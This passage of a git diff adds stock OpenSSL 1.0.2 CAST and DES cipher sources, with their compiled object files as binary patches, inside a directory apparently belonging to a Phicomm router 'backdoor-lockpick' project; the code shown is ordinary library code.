z@>wRmuPdBQ=dwz;rz_i~gu4d^m9S0m8qdO+{_wv3RM$Qwoa*1dKivnuef`;V7`~CN
z8O(O2_R{rd`-Z{;nf`%vCVP-H(!Gh@8Q7}g^7@}m0|lH?x_t_I5jy)iJ*T*Wrk^jB
zyWk8TDUkwkPJ(wh<qMQo{C|mU`O5*n_wFGsx=~(~z>%{x=+rK7uY{V?{XcDw-@`C2
z*`A-zlOi!1_`0nQF1*Hn@q><6l7w;m_z0Baj{(E}YvFL)G5TbJdqlT!{<+)&m3;2@
zJL&z&rO3A%8sS$Mnx=xpX=<+(h;zd6Gd=_-*uQLlk=pa~iv4B#A*k@mpRwF&5qGU0
zl;rlje!Tj|mQTLNY0vK$yu2F@*?uuFIrrG|^!xD_zKe=Vnd|q0k8rWuO?=2MlrK3&
I;a9f*H^lPujQ{`u

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_cast.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_cast.c
new file mode 100644
index 0000000..3f74548
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_cast.c
@@ -0,0 +1,89 @@
+/* crypto/evp/e_cast.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+
+#ifndef OPENSSL_NO_CAST
+# include <openssl/evp.h>
+# include <openssl/objects.h>
+# include "evp_locl.h"
+# include <openssl/cast.h>
+
+static int cast_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                         const unsigned char *iv, int enc);
+
+typedef struct {
+    CAST_KEY ks;
+} EVP_CAST_KEY;
+
+# define data(ctx)       EVP_C_DATA(EVP_CAST_KEY,ctx)
+
+IMPLEMENT_BLOCK_CIPHER(cast5, ks, CAST, EVP_CAST_KEY,
+                       NID_cast5, 8, CAST_KEY_LENGTH, 8, 64,
+                       EVP_CIPH_VARIABLE_LENGTH, cast_init_key, NULL,
+                       EVP_CIPHER_set_asn1_iv, EVP_CIPHER_get_asn1_iv, NULL)
+
+static int cast_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                         const unsigned char *iv, int enc)
+{
+    CAST_set_key(&data(ctx)->ks, EVP_CIPHER_CTX_key_length(ctx), key);
+    return 1;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_cast.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_cast.o
new file mode 100644
index 0000000000000000000000000000000000000000..be8576233b30c202d2a2ab74d661a020d5d08fdb
GIT binary patch
literal 4720
zcmb`LZ){Ul6u@uS!BFw7h~f;0{jiuVvS!l(tHIgVwcUN$n^e|r3j&X>ly!l1OZx^L
z8Xy@MUP^%vejsWhAN@cAAE!}a(eOnu(HJG5$wU&AMG~Tje^5N<y?eX6Yl}fR$?LiI
z_s%)@+;eYl@3tqbN2**d!o@|}$!w2PLQX2P?SS13kXoXUpKF)@q4sH~Zaea#+N)Wg
zsd3G^p~f`p%Q&^p^-$|iHL4ZOCZZMBtk4^O)f;bi`~Tk2Knq>@P@&87K8~mtI~wTJ
zrS=~%`lK5^=+tz(<~lR;3AL`i=YXs2bn3fyYJE*>Pkc_NuCzng7l`h<LS0wQMLZsc
zvcs&O#K^B~R5z#_)lI7Lv7Ig?_6sHzwQXqO)x2(9vd)Me>IU1CPL}4?rx*A1tG(1e
zrCDE<CU`4OKg4`N0zI@g@*}lARbQt2FPdwpe<r(HErjYly}EU?yBMl(&<c8eo>~`l
z>l$sGiFRARYp!dW>nA4<|F?$PPis48W=@sQ`(Db-O5D|dpUSKkols)Yq%!xZy=q*I
z#e38!E!61AbhYL`x3fuagd+W=SvR4Mnsv72VxikZ3-P>GY<&v$$8y~@V+Ymz-{dZr
zEd(vj!-6|2^dIeEFkAqS2R%R@a8$+5eHGu7e=!0W_ZY^<aTdaJC%N1B83-oEf9OuZ
z;oaTF-wr;!KBynOU-3ITI-d77#0SPQ=9t&-d(PL~)UtZa?zZfHw%OO*+UQ_sz-mxf
zLtNR;m*S*~kkiQUYmf4%qljzQI^xQETuT?$EI0y%2?1Zm-km@lQ9OsMbfxZ)JFIw%
z)nTRK;JlF1{QCTm(l${ORsvN!l(vY{tSSvb#T!)Wf{G`oET{+9EiBG6EY88IkWx3{
z4k_N4QU`Itj6~txL1tG(9mVk?I3ArlUKft1DS@a$`;_Q9g$9*CXSt#6IZU&d_c8~p
zMFVaYkoEXs*8-+^$PH61RtK>bD%L{9+#sJ_W%I#x7-ezzenz&h3_B_@T&Lp_15{Da
zw3=MMUCzK=_Lm6v1m6{Nz1$E<7TnKOLL9rkz?L%3`}UdxYh?TaXcT*mL9c-a;|#L7
zaldZHm%xTavFi@{3Op{@&0c2Tk1s)Pz=QlWc0f3v2X@Fe+jN#MW}M-YJ@(!9w}ro%
z)o%M6J=^CkcZJi>UEy2rCN<o(q&Gne_kt`YfO33)1^!M2e!K!dRe^s|fqxJD5vb@W
zTNl2MuQUFd#PJG*_6H<h%lI1-e-e1P`L<TzBxNKMIn$RUs8$-ufuxZf8cnCNHZX=V
zL#DAUHO^me9az;W8mu%%whqh%sbmQlo%-6KsvBz~k)CkOh^aw6Y>*DMCuR?n$|SSn
zqb3RWMvV?FO2g}nj#xhqXKYVp2F<i%noBt;IDU2p+|x#o0VFjCVGbN%^wQ+)u~-k?
zgg%53dJsX(3v)>1GA+i?4iOIu7*>#w9{Ur|4(GSw7Q3juS%H5f@W-Id?avB)iNGVU
zjwl%aad^1BeUD<iPT(%KKhR#}y#jwiu;0lzD!f`RW8+Oo`~!H0a#-RU98BJlIL{Mv
zK*6wR!p|!&v{5+c=T@78ZN8kfQ3Y5V?Vn<8RC(6sad`Z_66fdTQGtu`j|p6ie_r5X
z{?iiY=k#v^7vtL#f_HNMZ3q|_;|C<}SiyNLa54U7fs6TjnIp!=hfA6@IOlacB5^*i
z%M$1HT*1cWario#66fdN0g3bT?`?_m^Y5g@`T0kDx$$8$F#y`kIy%i;+0^!g&rIb_
z;@gri6T~-=%MqVVv5zfZc7*tnBg4a~3|M7G%#;sqdrdhrk=(}mgPAekXm(^Yl{Lqi
zcPedc%_fFZyomRpz2J*en=i!(u>LV|v4F8Ml&taIfZy>zi8zf(c5(JH2mHOkCf=!0
z>KsL$28~?4!AwizGV_0pzXD!h%>V1Z3ViQ0exBve$M^CE(=DLO&Hp_6!(=b>$NA%3
zUY>skFf?g~N0fdH3c~MUPS3H$Hcv|z+S~^91oIaewz(hYcy8jYMlSaO=I`Z(O!NFX
z#(NINl>Ogj{->n@W&aWIMbiL0qVzxP^!T}l^}{X2{rUbWH#T~v`G#g21H&yY<Bxy;
f%6kV8NwYtUyQKW3E?HE;znT4iXg3BEME3s&-_3o|

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_des.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_des.c
new file mode 100644
index 0000000..aae13a6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_des.c
@@ -0,0 +1,268 @@
+/* crypto/evp/e_des.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#ifndef OPENSSL_NO_DES
+# include <openssl/evp.h>
+# include <openssl/objects.h>
+# include "evp_locl.h"
+# include <openssl/des.h>
+# include <openssl/rand.h>
+
+typedef struct {
+    union {
+        double align;
+        DES_key_schedule ks;
+    } ks;
+    union {
+        void (*cbc) (const void *, void *, size_t, const void *, void *);
+    } stream;
+} EVP_DES_KEY;
+
+# if defined(AES_ASM) && (defined(__sparc) || defined(__sparc__))
+/* ---------^^^ this is not a typo, just a way to detect that
+ * assembler support was in general requested... */
+#  include "sparc_arch.h"
+
+extern unsigned int OPENSSL_sparcv9cap_P[];
+
+#  define SPARC_DES_CAPABLE       (OPENSSL_sparcv9cap_P[1] & CFR_DES)
+
+void des_t4_key_expand(const void *key, DES_key_schedule *ks);
+void des_t4_cbc_encrypt(const void *inp, void *out, size_t len,
+                        DES_key_schedule *ks, unsigned char iv[8]);
+void des_t4_cbc_decrypt(const void *inp, void *out, size_t len,
+                        DES_key_schedule *ks, unsigned char iv[8]);
+# endif
+
+static int des_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                        const unsigned char *iv, int enc);
+static int des_ctrl(EVP_CIPHER_CTX *c, int type, int arg, void *ptr);
+
+/*
+ * Because of various casts and different names can't use
+ * IMPLEMENT_BLOCK_CIPHER
+ */
+
+static int des_ecb_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                          const unsigned char *in, size_t inl)
+{
+    BLOCK_CIPHER_ecb_loop()
+        DES_ecb_encrypt((DES_cblock *)(in + i), (DES_cblock *)(out + i),
+                        ctx->cipher_data, ctx->encrypt);
+    return 1;
+}
+
+static int des_ofb_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                          const unsigned char *in, size_t inl)
+{
+    while (inl >= EVP_MAXCHUNK) {
+        DES_ofb64_encrypt(in, out, (long)EVP_MAXCHUNK, ctx->cipher_data,
+                          (DES_cblock *)ctx->iv, &ctx->num);
+        inl -= EVP_MAXCHUNK;
+        in += EVP_MAXCHUNK;
+        out += EVP_MAXCHUNK;
+    }
+    if (inl)
+        DES_ofb64_encrypt(in, out, (long)inl, ctx->cipher_data,
+                          (DES_cblock *)ctx->iv, &ctx->num);
+    return 1;
+}
+
+static int des_cbc_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                          const unsigned char *in, size_t inl)
+{
+    EVP_DES_KEY *dat = (EVP_DES_KEY *) ctx->cipher_data;
+
+    if (dat->stream.cbc) {
+        (*dat->stream.cbc) (in, out, inl, &dat->ks.ks, ctx->iv);
+        return 1;
+    }
+    while (inl >= EVP_MAXCHUNK) {
+        DES_ncbc_encrypt(in, out, (long)EVP_MAXCHUNK, ctx->cipher_data,
+                         (DES_cblock *)ctx->iv, ctx->encrypt);
+        inl -= EVP_MAXCHUNK;
+        in += EVP_MAXCHUNK;
+        out += EVP_MAXCHUNK;
+    }
+    if (inl)
+        DES_ncbc_encrypt(in, out, (long)inl, ctx->cipher_data,
+                         (DES_cblock *)ctx->iv, ctx->encrypt);
+    return 1;
+}
+
+static int des_cfb64_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                            const unsigned char *in, size_t inl)
+{
+    while (inl >= EVP_MAXCHUNK) {
+        DES_cfb64_encrypt(in, out, (long)EVP_MAXCHUNK, ctx->cipher_data,
+                          (DES_cblock *)ctx->iv, &ctx->num, ctx->encrypt);
+        inl -= EVP_MAXCHUNK;
+        in += EVP_MAXCHUNK;
+        out += EVP_MAXCHUNK;
+    }
+    if (inl)
+        DES_cfb64_encrypt(in, out, (long)inl, ctx->cipher_data,
+                          (DES_cblock *)ctx->iv, &ctx->num, ctx->encrypt);
+    return 1;
+}
+
+/*
+ * Although we have a CFB-r implementation for DES, it doesn't pack the right
+ * way, so wrap it here
+ */
+static int des_cfb1_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                           const unsigned char *in, size_t inl)
+{
+    size_t n, chunk = EVP_MAXCHUNK / 8;
+    unsigned char c[1], d[1];
+
+    if (inl < chunk)
+        chunk = inl;
+
+    while (inl && inl >= chunk) {
+        for (n = 0; n < chunk * 8; ++n) {
+            c[0] = (in[n / 8] & (1 << (7 - n % 8))) ? 0x80 : 0;
+            DES_cfb_encrypt(c, d, 1, 1, ctx->cipher_data,
+                            (DES_cblock *)ctx->iv, ctx->encrypt);
+            out[n / 8] =
+                (out[n / 8] & ~(0x80 >> (unsigned int)(n % 8))) |
+                ((d[0] & 0x80) >> (unsigned int)(n % 8));
+        }
+        inl -= chunk;
+        in += chunk;
+        out += chunk;
+        if (inl < chunk)
+            chunk = inl;
+    }
+
+    return 1;
+}
+
+static int des_cfb8_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                           const unsigned char *in, size_t inl)
+{
+    while (inl >= EVP_MAXCHUNK) {
+        DES_cfb_encrypt(in, out, 8, (long)EVP_MAXCHUNK, ctx->cipher_data,
+                        (DES_cblock *)ctx->iv, ctx->encrypt);
+        inl -= EVP_MAXCHUNK;
+        in += EVP_MAXCHUNK;
+        out += EVP_MAXCHUNK;
+    }
+    if (inl)
+        DES_cfb_encrypt(in, out, 8, (long)inl, ctx->cipher_data,
+                        (DES_cblock *)ctx->iv, ctx->encrypt);
+    return 1;
+}
+
+BLOCK_CIPHER_defs(des, EVP_DES_KEY, NID_des, 8, 8, 8, 64,
+                  EVP_CIPH_RAND_KEY, des_init_key, NULL,
+                  EVP_CIPHER_set_asn1_iv, EVP_CIPHER_get_asn1_iv, des_ctrl)
+
+    BLOCK_CIPHER_def_cfb(des, EVP_DES_KEY, NID_des, 8, 8, 1,
+                     EVP_CIPH_RAND_KEY, des_init_key, NULL,
+                     EVP_CIPHER_set_asn1_iv, EVP_CIPHER_get_asn1_iv, des_ctrl)
+
+    BLOCK_CIPHER_def_cfb(des, EVP_DES_KEY, NID_des, 8, 8, 8,
+                     EVP_CIPH_RAND_KEY, des_init_key, NULL,
+                     EVP_CIPHER_set_asn1_iv, EVP_CIPHER_get_asn1_iv, des_ctrl)
+
+static int des_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                        const unsigned char *iv, int enc)
+{
+    DES_cblock *deskey = (DES_cblock *)key;
+    EVP_DES_KEY *dat = (EVP_DES_KEY *) ctx->cipher_data;
+
+    dat->stream.cbc = NULL;
+# if defined(SPARC_DES_CAPABLE)
+    if (SPARC_DES_CAPABLE) {
+        int mode = ctx->cipher->flags & EVP_CIPH_MODE;
+
+        if (mode == EVP_CIPH_CBC_MODE) {
+            des_t4_key_expand(key, &dat->ks.ks);
+            dat->stream.cbc = enc ? des_t4_cbc_encrypt : des_t4_cbc_decrypt;
+            return 1;
+        }
+    }
+# endif
+# ifdef EVP_CHECK_DES_KEY
+    if (DES_set_key_checked(deskey, dat->ks.ks) != 0)
+        return 0;
+# else
+    DES_set_key_unchecked(deskey, ctx->cipher_data);
+# endif
+    return 1;
+}
+
+static int des_ctrl(EVP_CIPHER_CTX *c, int type, int arg, void *ptr)
+{
+
+    switch (type) {
+    case EVP_CTRL_RAND_KEY:
+        if (RAND_bytes(ptr, 8) <= 0)
+            return 0;
+        DES_set_odd_parity((DES_cblock *)ptr);
+        return 1;
+
+    default:
+        return -1;
+    }
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_des.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_des.o
new file mode 100644
index 0000000000000000000000000000000000000000..6d6a4b36fc12e383b6cfa2963b495f880c65db7d
GIT binary patch
literal 6808
zcmcJSZ%~xS9mn_XP|l8dAc^hJX!Y7bb2M_pH8vidgx&)j?3D+-kv}4heFDcB7!{b~
z!9s>AEz$AG<<fLwX7VyGI@9!(edUm(ZD6$47n16j*mSB>w22XIG@Z7><d5|C+h_M!
zmgj6Ir8^wE``O*^@3;T=ITSPMydDn`!9%LZLQYUZ-uuczI?9q!QbaWJkD~RT#O*n1
z&nDuT{vrDNBcr_Hb&SVRtNkR_(s#z+ns>r?_13t3M{kMSQ+jjUey4@nQ%%(VR8PdS
zTSD>d<C~4LTSnRK#>&qRRAg$3^`<va$H+Fc(M-b-oxECQWNU&6$Ak}x=;U-&-1ED(
z_M5+<_Knvabfbz+Ua6w?A8FC?^K|mVDp0R7JRefe4QnmPqL!XO)de+um)_pay#D@f
z{Yibd{sY}~b^mR2|6fbox5|m*{~e=jwz2Z=fgoDRxsQg>ebw{RH&5NuZ|e!d9lsy-
zgwISSkGp!S-l8|RH0cSNDKwJZ1@X$MAC?<sGt~Y(ZqLT;i*fsG_|KU}7>AZ27@7^>
z_<F;0lZnPFFAcn(N7=}34}t<t;$0ktcfkys!8c(hF!<@%-y&T!Q?M}zIcnFI2E!9{
zoX>tCt(>Gqb$_CVKPr0mEv!&^x#%Y+Fp({|3=xTi-^WINqq3{iU-aw|K!!bCYhR&R
ztMuW<OdTwN>%Q6ZG&@qdNiRClyn>8fDa0lv7e09%m&)YT!lTVlmT4_c>~KckHcA7m
zYcvD?M4z)tw}K+Hi_f2mXV(;tT^k)Ag{BwgqD3d}T(~=X?i=1!A0PF$?=mt*Y4J=S
zxKGP2$35`(7g~9f7S&&#i6BJ1F8Zj`TWf`5Wb9OAIhRqGZ3EV~H~csrnHpRLu$Zn?
zE!hXBVIRCn?U`|BAI!i$n1+4u2iON^oP8kH(~Pwag>e%EbGnXR-kmUZW`6AM%E528
z{1zQSS$m50S+^&`6S2b+2k)cyZARD#>^|wTfpWX&Y)hkkjoR-z`=4gE57EqzaUSU5
ziNT?UthJGRFFUf47-frgRBfiAnD455JL;riUsX<mi_S@KtqNAow_!)!GCWtU4Y;FF
z4>u=s`{rsRTOWkx(2x0ZuDgI{SAdU%_3VqLQQ&7@!p>V9O8ogCf3I-#UWG1YFaDqP
zzXmpi?`Yn$%>I|7revdFnf2Ez`pZ538zkRxoV?5Be|=5OcLKqd&cR-5Fi;tKG*nR@
z-a5##;e+3*2vuw;b1)c%PyoMT_~ELp-_}CFjR|CULSR_qM8xyV4&oUq_N-l9=zkFg
z9{D<6wh7|~t+-wDlP4j$g>yW^Nu5^wQ?H?wyx@yzfowrc3qHT1R;xI&vQ~?X6~?q^
zn?_r;#14(>S~RWExR$8bXtfsAwMd;-p=-fvEl{nMRBOf6pkE7;$GHCS|4QF`z)c8s
zE^(dqoDSG|!3XxT1=Z-Mj(&n4V};<)Gj1}Z8QPZOLWEF-G3#%9aetW(>+d$L-)n0_
zx;E-Lgi-&Ht14mRIKp*LqWFIt$6XrTDaNr+qucI1jwK*@iR*7g{YI_$h__qw>!;Zm
z&+)Riv24LM8=HkWtmkv+ec7!WxUQmnU9UzR2*{dUShousabb9FVGw$_4u7sNRw2(n
z>{bE!`@CDR&-I0idqM1m#jSj7_bg_sAnTQM*xmq!&t&8x&-MnehdKWMVhn6eL;M*0
zu>LVV4{VJBi*bI7bGGJywQ#<fyUNxKuoUOFIcIYXte5jmxY;4Fd4@O)x*j+Urn!C_
zD<$L!&PNsAz<EI7J2{`=?S)Q~^QRQv&pF3L)W^J!olc@;A@;EwW+5+9K7zBbH2BDu
zmO>ytQn-Zw2neoKHM|7CjsG$a$EUAb{i!@0-??t}Kgz@J=HaVgJl%BG<>BSPAAp(v
zCtnX@e^qiWra<s|&R65b0YUI4&Px<-a$c(NeVkV)d>FW!|9JPfags8-QUjqRf&XSt
zZ;xf}O%1b5a!==DTg+rne|IX)K;NEDIh#r@%0l(9TnzchqP&&f=je7O1vl%B?bW(r
zZm+9riZz?fdbJTVNo}mj97r)o%)#DdcPhCz)y1geQmQwZ9`3go0iVE0nV?&89@^yc
zra54BB=?%h?!D%oj-GvFhrX@W>>RdI139aGU0r5>N4m!vW~es_?h3tFYXV2h1V(ac
z^dOf5e{yN?B$vj~kuwpNsfj0OYzOOX$3Sn`>^UIgr(p~PCTpGL!cNYwLi#iQ@pn+-
z4@vxN9v*>pfB}~)Y6_i0dH6dL$9IdUf1KYPsDp1-!PoHf5;?vF1wSHjx&FmG+|TzD
zM)>9vIuA)aAo1rU{&k6;&%;0E9J}!#{KTDJ$oG@r;w|x@!tp%7utDL!b})HF;rPD8
zuvOurU-+)TfU<mOSw6u2FK}^BMI;{NX^f&gjXGsKjS=N(p)c;WA%*iS8CAHrH(!ys
zZ1+`(%XVLrIQC1}eNW*$OQsbr?(sQ^%XZm-L7CcLKLXBWyJG!|ad2wExGD8N;00|G
zm+d|!ak;<U5|{11qHtmNRfUUp&bY*7yAu+Z?VgdiY<EuK!me0kSd8_>d!__45Rl7u
z0}_|*1|^P3F~0#wV?f5MuzZC5U*Mv@VqJ;)V*IC-`eHo<dA~$`u|7u?F80f`!iAro
zDO`+0Eq7Yzi~GGz;o^SZr*Lt<k1AZ;@5dA_?)TReF79^{8W`Shb#y{(rJcB2q|&K<
z9U&_<WRXx;ht)wsodW|T#3<%56-xJ!P_l3T{!}m2>g}^qA^2)7XV)RmKixYR>QDFe
zr_ylsIjvLO=ALxN{uG~s|0N1QV;t(0ib#~_ALr+yDCW~5vh1$HBRiTSPNI!JYQ+5F
zdkWk7dA$-I<2pmmuNzJY8By$t0@eOzC_v3G+8)14-0Y8X`w>3x!hS#`cpQe<t^bh+
zoC@c7d+a|-s{OA4hW0DqCx>zVgnvYakQV(Hu^}<J>R*?B0<dDyPSnNw534HOB-eTS
zfT+l0;lIEZBv4ar@8=cAl>)VWAGCEFKmV5<3kmKpjvs#Qi1uRrxY@>*6a3TYW4<u%
t1BPwX_N#!YYX=bdm4^Qb`GqoIN|xLYb==yw;RiAV@eXuy3-c%P{|0t%4Tk^#

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_des3.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_des3.c
new file mode 100644
index 0000000..301d93e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_des3.c
@@ -0,0 +1,493 @@
+/* crypto/evp/e_des3.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
